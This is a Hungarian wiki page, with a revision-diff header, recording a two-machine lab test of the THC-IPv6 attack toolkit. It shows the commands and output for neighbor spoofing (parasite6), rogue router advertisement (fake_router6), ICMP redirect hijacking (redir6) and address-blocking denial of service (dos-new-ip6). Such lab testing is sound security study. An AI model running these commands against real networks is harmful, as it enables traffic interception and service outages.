Size: 6312
Comment:
|
Size: 6438
Comment:
|
Deletions are marked like this. | Additions are marked like this. |
Line 28: | Line 28: |
[[Képernyőképek]] | [:HackScreenshots: Képernyőképek az eszközök használatáról] |
Line 36: | Line 36: |
=== Parasite6 === | === Parasite6 === |
Line 38: | Line 38: |
{{{ |
|
Line 47: | Line 49: |
}}} | |
Line 50: | Line 53: |
{{{ | |
Line 59: | Line 63: |
}}} | |
Line 61: | Line 65: |
{{{ | |
Line 64: | Line 69: |
}}} | |
Line 67: | Line 72: |
{{{ | |
Line 72: | Line 78: |
}}} | |
Line 74: | Line 80: |
{{{ | |
Line 76: | Line 83: |
}}} | |
Line 78: | Line 85: |
{{{ | |
Line 85: | Line 93: |
}}} | |
Line 90: | Line 98: |
{{{ | |
Line 96: | Line 105: |
Felvettem egy routot egy fec0::1:1 címre, ezt akarom majd eltéríteni. | }}} Felvéve egy routot egy fec0::1:1 címre, ezt akarjuk majd eltéríteni. {{{ |
Line 98: | Line 109: |
}}} | |
Line 101: | Line 113: |
{{{ | |
Line 106: | Line 119: |
}}} | |
Line 111: | Line 125: |
IPv6 specifikus hacking eszközök
A [http://freeworld.thc.org/thc-ipv6/ THC-IPv6] eszközkészlet célja különböző támadások megvalósítása, specifikusan az IPv6 protokollt célozva. A készlet a követekző eszközöket tartamazza:
alive6 - felderítő eszköz, adott címre válaszoló rendszerekhez
detect-new-ip6 - hálózathoz újonnan csatlakozó eszközök automatikus felderítése.
dos-new-ip6 - címütközés hamisítása és így az újonnan csatlakozó eszközök működésének megbénítása.
fake_advertiser6 - hirdetések hamisítása.
fake_mipv6 - mobil IP címek hamis kérése.
fake_mld6 - Multicas csoport üzenetek hamisítására
fake_router6 - Router üzenetek hamisítására, közbeékelődéses és forgalomelterelő támadásokhoz
parasite6 - ICMP6 neighbour solicitation üzenetek hamisítására, például beékelődéses támadások létrehozásához
redir6 - beékeléses támadás ICMP6 redirect üzenetek hamisításával
rsmurf6 - Távoli smurf támadás
sendpees6 - ND neighbour solicitation üzenetek generálás, a célpont CPU idejének fogyasztásához.
smurf6 - Helyi smirf támadás.
toobig6 - Hamis üzenetekkel MTU csökkentése.
A csomag telepítése
A teszt Debian Linux alatt történt, a telepítés csomagból történt. A következő lényeges csomagokat kellett telepíteni, az apt-get install ... csomagkezelő használatával: gcc, libc6, libc-dev, libpcap-dev, libssl-dev. Ezek után a THC forrásból fordítható.
THC tesztek
[:HackScreenshots: Képernyőképek az eszközök használatáról]
Alive6
./alive6 eth0 Alive: fe80:0000:0000:0000:020c:29ff:fed8:f478 Found 1 systems alive Sikeresen felismerte a másik Linux-os gép Link Local IP címét.
Parasite6
A spoofingot végző hoszt IP címei:
ip -6 addr 1: lo: <LOOPBACK,UP> mtu 16436 inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP> mtu 1492 qlen 1000 inet6 fec0::1/124 scope site valid_lft forever preferred_lft forever inet6 fe80::20c:29ff:fed8:f478/64 scope link valid_lft forever preferred_lft forever
Minden forgalom átirányítása saját maga felé, ezzel egyidőben a másik gépen ping6 forgalmat generalok, hogy legyen mit eltéríteni (ping6 fec0::3 -I eth0, ping6 fec0::4 -I eth0):
./parasite6 eth0 Remember to enable routing (ip_forwarding), you will denial service otherwise! Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ... Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0001 Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fec0:0000:0000:0000:0000:0000:0000:0002 Spoofed packet to fe80:0000:0000:0000:020c:29ff:fed8:f478 as fe80:0000:0000:0000:0219:e0ff:fe14:6503 Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fe80:0000:0000:0000:020c:29ff:fed8:f478 Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0003 Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0004
A másik gépen ezután több fals szomszéd is látszik:
ip -6 neigh fec0::4 dev eth0 lladdr 00:19:e0:14:65:03 STALE fec0::3 dev eth0 lladdr 00:19:e0:14:65:03 STALE
Fake_router6
Előtte:
ip -6 route fe80::/64 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332933sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295 unreachable default dev lo proto none metric -1 error -101 hoplimit 255
Jöhet a fals route beinjektálása:
./fake_router6 eth0 fe80::1 2001:2001::/32 1500 Starting to advertise router fe80::1 (Press Control-C to end) ...
Ezután a másik gép routing táblája:
ip -6 route 2001:2001::/32 dev eth0 proto kernel metric 256 expires 8590469sec mtu 1492 advmss 1432 hoplimit 4294967295 fe80::/64 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332821sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295 default via fe80::1 dev eth0 proto kernel metric 1024 expires 65538sec mtu 1492 advmss 1432 hoplimit 255 unreachable default dev lo proto none metric -1 error -101 hoplimit 255
Látható, hogy valóban bekerült az új routing bejegyzés.
Redir6
Előtte:
ip -6 route fe80::/64 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332270sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::1:1 via fec0::5 dev eth0 metric 1024 expires 21334372sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295 unreachable default dev lo proto none metric -1 error -101 hoplimit 255
Felvéve egy routot egy fec0::1:1 címre, ezt akarjuk majd eltéríteni.
./redir6 eth0 fec0::2 fec0::1:1 fec0::5 fec0::1
Nem lett új route bejegyzés, de érdemes megnézni a capture fájlt. Valószínűleg a routerek hiánya miatt nem sikerült eltéríteni.
Dos-new-ip6
./dos-new-ip6 eth0 Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ... Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0001 Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0002 Spoofed packet for existing ip6 as fe80:0000:0000:0000:020c:29ff:fed8:f478
Valóban nem enged új interfészeket feljönni a linkre.
A detect-new-ip6 gyakoraltilag ugyanazt csinálja, mint az alive6.
A smurf6 attack-ot nem lehet egy ilyen kicsi hálózat esetén kipróbálni (tulajdonképpen két ipv6 eszközvolt a próba során összekötve). A Debian nem reagált sem a smurf, sem a sendpees támadásra, csak a kérések láthatóak a vonalon. Az önkéntes Neighbor Advertisementre a másik gép nem reagál, nem írja be a szomszédok közé a hírdetett IP-t.